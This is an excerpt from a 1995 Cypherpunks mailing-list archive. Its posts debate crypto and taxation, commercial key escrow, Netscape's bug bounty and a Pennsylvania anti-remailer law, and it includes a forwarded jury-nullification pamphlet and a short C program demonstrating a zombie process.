And if it ever stops being true, we'll just get VAT, and VAT inspectors.  
So the line about death and taxes remains as true as ever, crypto or no.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 15 Oct 95 11:42:49 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: what are these people selling????
In-Reply-To: <aca45d8413021004e721@[205.199.118.202]>
Message-ID: <199510151842.OAA28929@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> At 11:43 PM 10/13/95, Censored Girls Anonymous wrote:
> >I mean maybe we could get Microhard to do a meeting.
> >Or the dreaded RSA or somebody.
> 
> Jim Bidzos, President of RSADSI, attended our special "Clipper" meeting the
> weekend after Clipper was announced, in April 1993.
> 
> I'm not saying this in defense of RSADSI and their patent situation, just
> to note that they are not "dreaded."

Jim Bidzos and some of us might have interesting interactions on
patent issues, but I've got to emphasize that he's no demon. He's a
guy trying to make a buck on his patent properties -- by and large he
has the same interests about seeing cryptography spread that the rest
of us do.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 15 Oct 95 11:51:00 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <Pine.SUN.3.91.951015135302.4606A-100000@viper.law.miami.edu>
Message-ID: <Pine.SUN.3.91.951015141533.18407A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, Michael Froomkin wrote:

> On Sun, 15 Oct 1995, Duncan Frissell wrote:
> > On Sun, 24 Sep 1995, Rick Busdiecker wrote:
> > > I'm guessing that you're talking about the fact that fully applied
> > > crypto (e. g. fully anonymous digital cash) makes it essentially
> > > impossible to base a tax system on income.
> > Yep.
> [....]
> Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
> by people as well as EARNED by people.  Most payers have easily 
> detectible physical presence and assets that can easily be attached by 
> regulators.   It will be a cold day before, e.g., my employer agrees not 
> to report my earnings.  And the same is true for most employers in most 
> industries.  

Were I an overseas employer, I would be quite happy to work in a 
"disinterested" jurisdiction and hire American workers to telecommute and 
issue their pay blindly to the number only or crypto bank account of their 
choice and promptly encrypt or lose the records.

Remember, there is an incentive for employERS as well as employees to 
flee the tax system of a nation that is manipulative of it.  Employers 
who work in tax free ways will be able to pay their employees less, quite 
a bit less.  Given a 32% tax rate, an employer with the advantage of no 
income reporting on employees will easily be able to drop a given salary 
25% and attract employees quite easily.

Who are you going to work for?  The publisher who is based in New York 
and reports all payments, or the publisher who works in the Cayman 
Islands, reports nothing, and merely sells the manuscript to the big name 
publisher in New York after purchasing it blind from you?

> And if it ever stops being true, we'll just get VAT, and VAT inspectors.  
> So the line about death and taxes remains as true as ever, crypto or no.
> 

I believe it will be extremely hard for VAT inspectors, in future, to 
determine one of a few things needed to assess VAT taxes.

1> Identity of employers within their jurisdiction
2> Identity of employees within their jurisdiction
3> Who is working "IN" their jurisdiction
4> Who is a U.S. citizen

How can you say that the 2 meg random data file that Mr. X sent to 
Publishing Company B is worth $2mil?  That the encrypted letter to client 
Q is the sum of legal work worth $80,000 in services and research?  These 
are particularly difficult to determine when the bank transaction are 
made with truely anonymous e-cash and overseas accounts.  It's simply not 
possible unless:

1>  The state has enforced toy crypto
2>  The strong crypto the parties use is broken
3>  The parties tell.

At some point, the only thing your going to be able to tax is "Goods."  
As in solid and measureable.

When this is true, the most profitable venture in the United States will 
be retail smuggling.  And as taxes are raised again and again, compliance 
will drop and drop until the largest portion of the national budget will 
be enforcement of the Value Tax Reform and Retail Laundering and 
Terrorism Act of 2002.

Again, the more difficult it gets to do business in the United States 
without taxation far out of proportion to other nation states, the fewer 
companies will stick around.  I might add that as technology progresses, 
fewer and fewer companies will NEED to work in the United States.

What I have not discussed here are the various political problems 
involved.  I admit they exist, but I haven't quite come to a conclusion 
of how the balance between government self preservation and blind 
and secure transactions will balance out.  I believe in part it rests on 
how much the United States will be willing to abide by various 
constitutional provisions.  Americans are going to have to decide if 
they really believe in free speech and freedom, a question which has 
begun to surface quite obviously of late.

It will literally take a dictatorship to enforce taxation in any real 
way in 15 years, if not sooner.  VAT, income, sales tax, or otherwise.

> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> U. Miami School of Law     | froomkin@law.miami.edu
> P.O. Box 248087            | http://www.law.miami.edu/~froomkin
> Coral Gables, FL 33124 USA | New address, but it's still just as hot here.

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 15 Oct 95 15:26:11 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <Pine.SUN.3.91.951015141533.18407A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.951015151343.25547F-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 15 Oct 1995, Black Unicorn wrote:

> At some point, the only thing your going to be able to tax is "Goods."  
> As in solid and measureable.
> 
> When this is true, the most profitable venture in the United States will 
> be retail smuggling.  And as taxes are raised again and again, compliance 
> will drop and drop until the largest portion of the national budget will 
> be enforcement of the Value Tax Reform and Retail Laundering and 
> Terrorism Act of 2002.

There is an article in this week's issue of THE EUROPEAN about
cigarette smuggling in Europe.  There is some regulatory
arbitrage from south to north because of disparities in the
local taxes on tobacco, but the big "problem" is American
cigarettes.  Since even in the lowest tax European countries
taxes make up 70% of the retail price of cigarettes, there is
huge incentive to smuggle in US smokes.  Makes me proud to be
an American.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 15 Oct 95 13:57:28 PDT
To: tedwards@Glue.umd.edu (Thomas Grant Edwards)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <Pine.SUN.3.91.951015160352.19623D-100000@volt.isr.umd.edu>
Message-ID: <199510151944.PAA00705@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> On Sun, 15 Oct 1995, Eric Murray wrote:
> 
> > What the hell is wrong with you people?  Up 'til a few months
> > ago, the oft-heard refrain on cipherpunks was "why won't the
> > software vendors listen to us?"
> 
> I have to agree with Eric.  We now have software vendors talking about 
> releasing more security source, taking bug reports seriously, etc.
> We are winning for crypto here.

Lets see if we can't get Microsoft some bad press. If they were to
start taking the quality of their software seriously, we would be
winning one for god, the queen, and the common good of all man kind.

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sun, 15 Oct 95 12:58:22 PDT
To: anonymous-remailer@shell.portal.com
Subject: Re: PA Remailer Concerns
In-Reply-To: <199510150647.XAA25530@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951015155654.19623C-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Oct 1995 anonymous-remailer@shell.portal.com wrote:

> I would be surprised if they were singling out anonymous remailers. 
>They may have had other concerns regarding phone abuse, e.g., long
>distance fraud.  

I am sure no PA state legislator knows what an anonymous remailer is.
They have just made them illegal though.  The question is, will the police
ever figure out what they are, and will they ever bother to selectively
enforce the law.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 15 Oct 95 13:00:34 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: My chat with  Goeff Greiveldinger
Message-ID: <Pine.SUN.3.91.951015155856.4677D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I will be appearing with  Goeff Greiveldinger, he of the Justice Dept, at 
a discussion of commercial key escrow next Thursday in Bethesda.  Anyone 
with fun questions I should throw at him should contact me...

Please note that the ostensible topic of this discussion is *commerical* 
key escrow, not Clipper per se, so I have to be diplomatic....

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sun, 15 Oct 95 13:05:57 PDT
To: Eric Murray <ericm@lne.com>
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510151855.OAA20783@slack.lne.com>
Message-ID: <Pine.SUN.3.91.951015160352.19623D-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, Eric Murray wrote:

> What the hell is wrong with you people?  Up 'til a few months
> ago, the oft-heard refrain on cipherpunks was "why won't the
> software vendors listen to us?"

I have to agree with Eric.  We now have software vendors talking about 
releasing more security source, taking bug reports seriously, etc.
We are winning for crypto here.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rosaphil <rugosa@escape.com>
Date: Sun, 15 Oct 95 13:32:03 PDT
To: nnnnnnnnJon Roland <ats-l@burn.ucsd.edu
Subject: called as juror (fwd)
Message-ID: <Pine.BSD/.3.91.950909080431.7657z-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain






             (Better Living Thru Better Living)                    
***************************************************************************
*        SNAIL ME             +      GABRIELLI'S  *ZINFANDEL*  (RED) &    *
*      YER ROSEHIPS           +                                           *
*  IF YOU LIKED THIS POST!    +     *ASCENZA*  (WHITE-BLEND)---YUMMY!     *
***************************************************************************
               [Ask Fer  *Gabrielli Wine*  at 
		yer local liquor store if'n ya
		want to tend yer rugosa]


	Let your voice be heard in the campaign to save the life of
	 		     Mumia Abu Jamal

               ++++ stop de execution of Mumia Abu-Jamal ++++
       ++++ if you agree copy these 3 sentences in your own sig ++++
     ++++ more info: http://www.xs4all.nl/tank/spg-l/sigaction.htm ++++


---------- Forwarded message ----------
Date: Sun, 3 Sep 95 17:50 EST
From: lindat@iquest.net
To: news@aen.org
Subject: called as juror

From: 
landers@AZStarNet.com (L. A. ANDERSON)


              IF YOU'RE CALLED FOR JURY SERVICE

Don't worry!  Be happy!  Look at jury service as an opportunity to "do good"
for yourself and others.  It's your chance to help the justice system
deliver justice, which is absolutely essential to a free society.

Also, you can do more "political good" as a juror than in practically any
other way as a citizen: your vote on the verdict is also a measure of public
opinion on the law itself--an opinion which our lawmakers are likely to take
seriously.  Short of being elected to office yourself, you may never
otherwise have a more powerful impact on the rules we live by than you will
as a trial juror.

However, unless you are fully informed of your powers as a juror, you may be
manipulated by the less powerful players in the courtroom into delivering
the verdict they want, instead of what justice would require.  That is why
this "kit" was written--to give you information that you're not likely to
receive from the attorneys, or even from the judge.

_ Justice may depend upon your being chosen to serve, so here are some
"words to the wise" about how to make it through voir dire, the jury
selection process: You may feel that answering some of the questions asked
of you would compromise your right to privacy.  If you refuse to answer
them, it will probably cost you your chance to serve.  Likewise, if you
"talk too much"--especially if you admit to knowing your rights and powers
as a juror, as explained below, or that you have qualms about the law itself
in the case at hand, or reveal that you're bright, educated, or are
interested in serving!  So, from voir dire to verdict, let your conscience
be your guide.
  
_ Nothing in the U.S. Constitution or in any Supreme Court decision requires
jurors to take an oath to follow the law as the judge explains it or, for
that matter, authorizes the judge to "instruct" the jury at all.  Judges
provide their interpretation of the law, but you may also do your own
thinking.  Keep in mind that no juror's oath is enforceable, and that you
may regard all "instructions" as advice.
                              
_ Understanding the full context in which an illegal act was committed is
essential to deciding whether the defendant acted rightly or wrongly.
Strict application of the law may produce a guilty verdict, but what about
justice?  If the jurors agree that, beyond a reasonable doubt, the accused
did act as charged, then "context becomes everything" in reaching a verdict
you can live with.  Credit or blame for the verdict will go to you, so be
sure to ask the judge how you can pose questions to witnesses, so that you
can learn the complete context, should the lawyers fail to bring it out. 

_ When they believe justice requires it, jurors can refuse to apply the law.
Jurors have the power to consider whether the law itself is wrong (including
whether it is "unconstitutional"), or is being applied for political
reasons.  Is the defendant being singled out as "an example" in order to
demonstrate government muscle?  Were the defendant's constitutional rights
violated during the arrest?  Much of today's "crime wave" consists of
victimless crimes--crimes against the state, or "political crimes", so if
you feel that a verdict of guilty would give the government too much power,
or help keep a bad law alive, just remember that you can refuse to apply any
law that violates your conscience.

_ Prosecutors often "multiply charges" so the jury will assume the defendant
"must be guilty of something".  But one of the great mistakes a jury can
make is to betray both truth and conscience by compromising.  If you believe
the defendant is not guilty of anything, then vote "not guilty" on all counts.

_ You can't be punished for voting according to your conscience.  Judges
(and other jurors) often pressure hold-out jurors into abandoning their true
feelings and voting with the majority "...to avoid the expense of a hung
jury and mistrial".  But you don't have to give in.  Why?  Because...

_ Hung juries are "OKAY".  If voting your conscience should lead to a hung
jury, not to worry, you're doing the responsible thing.  There is no
requirement that you must reach a verdict.  And the jury you hang may be
significant as one of a series of hung juries sending messages to the
legislature that the law you're working with has problems, and it's time for
a change.  If you want to reach consensus, however, one possible way is to
remind your fellow jurors that...

_ Jurors have the power to reduce charges against the defendant, provided
that "lesser included offenses" exist in law (ask the judge to list and
explain them, and the range of potential punishments that go with each).
Finding guilt at a lower level than charged can be appropriate in cases
where the defendant has indeed victimized someone, but not so seriously as
the original charges would indicate.  And, if it will be up to the judge to
decide the sentence, it's within the power of the jury to find the defendant
guilty of a reduced charge which will, at most, entail the amount of
punishment it thinks is appropriate. 

_ The Fully Informed Jury Association (FIJA) hopes the above information
helps you to find a verdict that you believe is conscientious and just, a
verdict which you can therefore be proud to discuss with friends, family,
legal professionals, the community or the media, should any of them want to
know what happened, how, and why.  If you have further questions, or want a
hard copy of this article and others contained in FIJA's "Jury Power
Information Kit", phone 1-800-TEL-JURY, and leave your name and address on
tape.  The office phone number for FIJA National HQ is 406-793-5550.  









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 15 Oct 95 14:27:18 PDT
To: Jim Gillogly <jim@acm.org>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <199510152027.NAA23085@mycroft.rand.org>
Message-ID: <Pine.SUN.3.91.951015171748.22497A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, Jim Gillogly wrote:

> 
> > Michael Froomkin <froomkin@law.miami.edu> writes:
> > I will be appearing with  Goeff Greiveldinger, he of the Justice Dept, at 
> > a discussion of commercial key escrow next Thursday in Bethesda.  Anyone 
> > with fun questions I should throw at him should contact me...
> 
> > Please note that the ostensible topic of this discussion is *commerical* 
> > key escrow, not Clipper per se, so I have to be diplomatic....
> 
> You might try addressing the areas of liability for escrow agents.  If
> private escrow agents can be sued for loss of information due to theft
> or other authorized or unauthorized release of keys, their liability could
> be horrendous, depending on the value of the compromised data. Gillogly
> Software certainly will not be a commercial keyholder!
> 
> 	Jim Gillogly
> 	24 Winterfilth S.R. 1995, 20:20
> 


You also might point out that commercial escrow is in a way MORE prone to 
compromise because it effectively doubles the number of entities entitled 
to demand release of the keys.

Instead of JUST government, you now have to face the possibility of key 
forfeiture by BOTH government and the commercial escrow agent, the escrow 
agent being, as it is, subject to the whim of governmental coercion to 
release keys as well as the agent's own reasons for doing so.

Effectively the potential for misuse is increased by virtue of the 
increased numbers of officals (commercial and public) who have access to 
the material.

I would like to hear the answer to this dilemna, which I am sure will 
include something about commercial key escrow easing the perceptions of 
the public, to which the obvious response will be, "Then this is a 
public relations move to avoid the perception of potential government abuse 
and a move which infact increases the level of risk, is that right?"

Perhaps I should attend.  Where and when is this precisely?

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 15 Oct 95 14:31:19 PDT
To: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Subject: Re: airport security
In-Reply-To: <951014071611.44602170@mitlns.mit.edu>
Message-ID: <Pine.SUN.3.91.951015172125.14647F-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 14 Oct 1995, Bob Bruen, MIT Lab for Nuclear Science wrote:

> like. The US security changes are a recent response, starting after the
> World Trade Center bombing and being stepped up on a continuing basis.

They really started earlier this year with the Unabomber threat to bomb 
an LA airliner earlier this year.

The peculiar thing is that skyjackings and aircraft bombings are much 
rarer now than during the '70s.  This is just a control ploy by the 
Feds.  There's no credible increased threat.  They just want to slowly 
introduce an internal passport.

> Today you need a picture ID to board with your ticket. Tomorrow...? We have
> lived in relative safety compared to the rest of the world, but I think those
> days are over. 

I wonder how many have challenged this.  Since IDs are still not required 
in life, what will they do if you simply present yourself without one.  I 
don't see that ID has anything to do with attack threats in any case.  
Attackers are more likely to have ID than to not have ID.

I suppose they are trying to discourage people from buying tickets in 
false names so that the databanks can be more useful to the authorities.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sun, 15 Oct 95 10:41:54 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: I am looking for a way to create a zombie process
In-Reply-To: <9510151556.AA26716@all.net>
Message-ID: <m0t4X3e-000DgnC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> Is there anyone who can give me a simple program or set of commands that
> creates a zombie process? Thanks in advance. 

Here, public domain.

#include <stdio.h>
#include <unistd.h>

int
main()
{
    if (!fork()) {
	/* Child; die. */
	exit(0);
    } else {
	/* Child dies, is zombie for ten seconds. */
	sleep(10);
	/* Reap it. */
	wait();
	/* Now no zombie. */
	sleep(10);
	exit(0);
    }
}
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 15 Oct 95 14:49:41 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <Pine.SUN.3.91.951015171748.22497A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.951015174534.14647G-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



> You also might point out that commercial escrow is in a way MORE prone to 
> compromise because it effectively doubles the number of entities entitled 
> to demand release of the keys.

Actually, any publically known escrow system opens your communications to 
any lawyer who gets a blanket discovery subpoena.  

These are very popular these days and often include third parties to any 
lawsuit.  Anyone who can convince a judge to issue an order...


DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@lagos.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 15 Oct 95 15:34:26 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510152232.SAA12387@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510141153.AA16412@all.net>,
Dr. Frederick B. Cohen <fc@all.net> wrote:
> 	The idea that Netscape (like Microsoft) thinks they can get free
> testing services from all over the net by real experts just by offerring
> a tee shirt is down right offensive.

But (amusingly enough) they can get free testing services from this
aspiring student for free just by providing source code.  Hey, it's fun! :-)
I'm no expert, but you get what you pay for. <grin>

[Psst: anyone wanna offer source code to the security modules?]


I do think their ``bug bounty'' system is an improvement -- at least
they're showing some concern for security, and beginning to admit
that outside review of security-critical code is...well...critical.

Still, I do agree that they really oughta be employing true experts
to carefully evaluate their system, if they wanna claim anything about
its security.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMIGMAyoZzwIn1bdtAQG98wF9Hr8lU8nXqP50MNwO2SNhsMUg5XhzfcWg
22Tsp8OkYV3F22gUcI6Un1w7peK7ciT5
=hs1A
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 15:34:03 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: airport security
In-Reply-To: <Pine.SUN.3.91.951015172125.14647F-100000@panix.com>
Message-ID: <Pine.3.89.9510151831.E61174-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 15 Oct 1995, Duncan Frissell wrote:

> I suppose they are trying to discourage people from buying tickets in 
> false names so that the databanks can be more useful to the authorities.
> 
You mean to the list marketing companies and the credit rating agencies.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 15 Oct 95 15:36:39 PDT
To: cypherpunks@toad.com
Subject: Re: My chat with Goeff Greiveldinger
Message-ID: <199510152234.SAA12406@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510152027.NAA23085@mycroft.rand.org>, jim@acm.org (Jim
Gillogly) wrote:

> You might try addressing the areas of liability for escrow agents.  If
> private escrow agents can be sued for loss of information due to theft
> or other authorized or unauthorized release of keys, their liability could
> be horrendous, depending on the value of the compromised data.

The problem of liability should be managable. There are commercial data
storage firms (microfilm, etc.) that not only have access to the key for
your data, but to the data itself. Still, liability lawsuits have not
driven them out of business. I therefore belive that liability issues will
not pose a significant obstacle to commercial key escrow.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMIGMiCoZzwIn1bdtAQHiJQGAlFhXEVKkf329xCbpWHHXYRkMNJUpbdDZ
nrEKcYvu9SVt/wlPLSq97sWukyQPxth0
=c5Wl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 15 Oct 95 15:50:48 PDT
To: cypherpunks@toad.com
Subject: Re: Yes, indeed the PA law is for real!
Message-ID: <v02120d04aca6d3c97f34@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>PA Senate Bill 655 was signed into law on June 13, 1995, and it does
>appear to make non-logged anonymous remailers illegal.

This is rich!  The PA legislature just set themselves up for an anonymous
e-mail shit-storm from people using *foriegn* non-logging remailers to
prove their point. Hold on to your shorts, you guys at hacktic, et. al.,
you're gonna have some fun now...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Oct 95 15:56:45 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510152256.SAA02632@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   All praise to Jeff and his fellow programmers for sharing
   the struggle to come up with stronger cypto, but, no praise
   at all to Netscape's front office guys bullshitting the
   stock holders and speculators. Check the press releases and
   the speeches to customers and investors.

   Scott McNealy shocked an audience into silence at a recent
   plush meeting of high-tech reps with investors by asking,
   "Anybody telling the truth here?" Then applause broke out 
for
   his shrewd beat-em-to-the-punch candor to offset the
   pervasive cynicism of oft-burned high-tech investors.

   Big bucks are not made by hard-working programmers but by
   the marketeers of NASDAQ and NYSE smoke and mirrors used to
   lure multitudes of unsavvy investors and Internet
   merchandisers.

   Netscape's leaders are protecting its major stockholding
   coldhearts, just like Microsoft, Intel, Motorola, AT&T,
   and the rest do, or they die in the financial fuck-the-
   public sharkpool. They couldn't care less about the bottom-
   of-the-ladder techies who do the grunge work, take the
   blame for programming mistakes produced under
   horrendous marketing deadlines, and then are left to
   commiserate with each other and gnaw knuckles.

   That's the joy and sorrow of this reading list, the ancient
   story, talented people working their asses off for sons of
   bitches who think employees are contemptible, disposable or
   bribeable for cheap change and backpats -- and easily
   replaceable on shore or off. Jeff's not alone in this bind.













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 16:01:47 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <Pine.SUN.3.91.951015151343.25547F-100000@crl.crl.com>
Message-ID: <Pine.3.89.9510151808.F61174-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 15 Oct 1995, Sandy Sandfort wrote:

> cigarettes.  Since even in the lowest tax European countries
> taxes make up 70% of the retail price of cigarettes, there is
> huge incentive to smuggle in US smokes.  Makes me proud to be
> an American.

Canada had exactly the same tax and had to eliminate it two years ago
after massive smuggling (supposedly in large part through native
reserves that straddle the border). The cigarette companies were actively
(I won't say alleged, it was definite) involved in the process, as they
exported their goods to a non-existant US market and let the packs sit
in cargo trailers to be picked up. 

Needless to say, there was no tax on exports. The previous gov had 
imposed one but had to drop it after massive cig. co lobbying alleging 
that Americans (who never even received the Canadian cigs) would switch 
to their own brands and jobs would be lost.

Cigarettes are a rather large industry and at the time were basically
operating a black market. One wonders how much easier this will become
once someone gets around to setting up a hard credible anon payment scheme.
The corporate willingness is certainly there. And I really don't see the 
securities industry (specifically currency markets) sticking around
once some competitive and sufficiently anon alternatives to the SEC go online
and offshore. Some sort of market regs enforcement is essential though,
you'll never have enough investor confidence for economically significant
blacknet exchanges otherwise. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 16:10:05 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <Pine.SUN.3.91.951015171748.22497A-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9510151747.D61174-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 15 Oct 1995, Black Unicorn wrote:

> Effectively the potential for misuse is increased by virtue of the 
> increased numbers of officals (commercial and public) who have access to 
> the material.

Does he mean mandatory commercial key escrow (as in clipper keys held
by credit agencies?) Or something totally voluntary but standardized
by the gov? 

*Rant mode on*

I've heard cracking into Equifax and TRW is considered a rite of passage in 
the phreaker crowd. The security would have to *damn* tight (as in forget 
it) for it to be trustworthy. And since it would probably be the big three
credit rating agencies (I forget the other one), their track record is not 
reassuring. I don't see these people securely using crypto throughout the 
entire org (in such a large org) in the future if they don't already.

Seeing my key sold to Son of Blacknet(LD) by Sons of Mitnick is not 
reassuring.

For that matter, what sort of databases would they consider holding this on?
And how easy would it be for the general public to get access to their key,
to verify for accuracy and revoke compromised keys. (big prob with the 
credit rating agencies) Who would be allowed (if anyone) or mandated 
(depending on which scheme) to certify the security? If NSA is 
mentionned, one might also point out the job Matt Blaze did on their 
Clipper. Bad production values don't make for good public security. 
 
Of course it all depends on exactly why they really want the escrow anyway.
If people will encrypt a second time with tomorrow's pgp, why should anyone
care? 

All you'd single encrypt for would be your income tax and the 
financial records you're already required by law to keep (I'm sure I've
misunderstood this. Can't be so useless.). I know that's not a particularily
diplomatic carry-over from the debated-to-death clipper thing, but really,
except as PR, why DO they still take this seriously? (unless you want to 
be paranoid about a ban, hmm, nevermind, debated-to-death)

Speaking of organizational crypto, anyone know what the scheme used in
Notes is? I know there's RSA... This seems rather more useful to examine
than MS's browser, considering corporations are making it a standard for 
groupwork. All you'd get on a browser would be credit no's and maybe e-mail.
Notes nets might carry the entirety of a company's docs and work in progress.
They do export it, right? Weakened foreign version or one 40 bit key version
for everyone? How about novell netware?

(Yeah, I do realize most folks don't have it, neither do I. A free client 
would be very nice, Mr. Gerstner, for everyone.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "& E. Metzger" <perry@piermont.com>
Date: Sun, 15 Oct 95 16:10:42 PDT
To: cypherpunks@toad.com
Subject: Netscape bugs bounty
Message-ID: <199510152310.TAA29098@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I am among the first people to be sarcastic about things Netscape has
done (I believe I originated the joke about the extra money from the
Netscape IPO being used to build a structure large enough to house
Marc Andreessen's ego), but I think this sniping about the Bugs Bounty
is silly. They are finally starting to try to do the right thing and
take problems, especially security problems, with their software
seriously and not sweep them under the rug. Cut them some slack. It
might not be perfect, but they are moving in a good direction.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
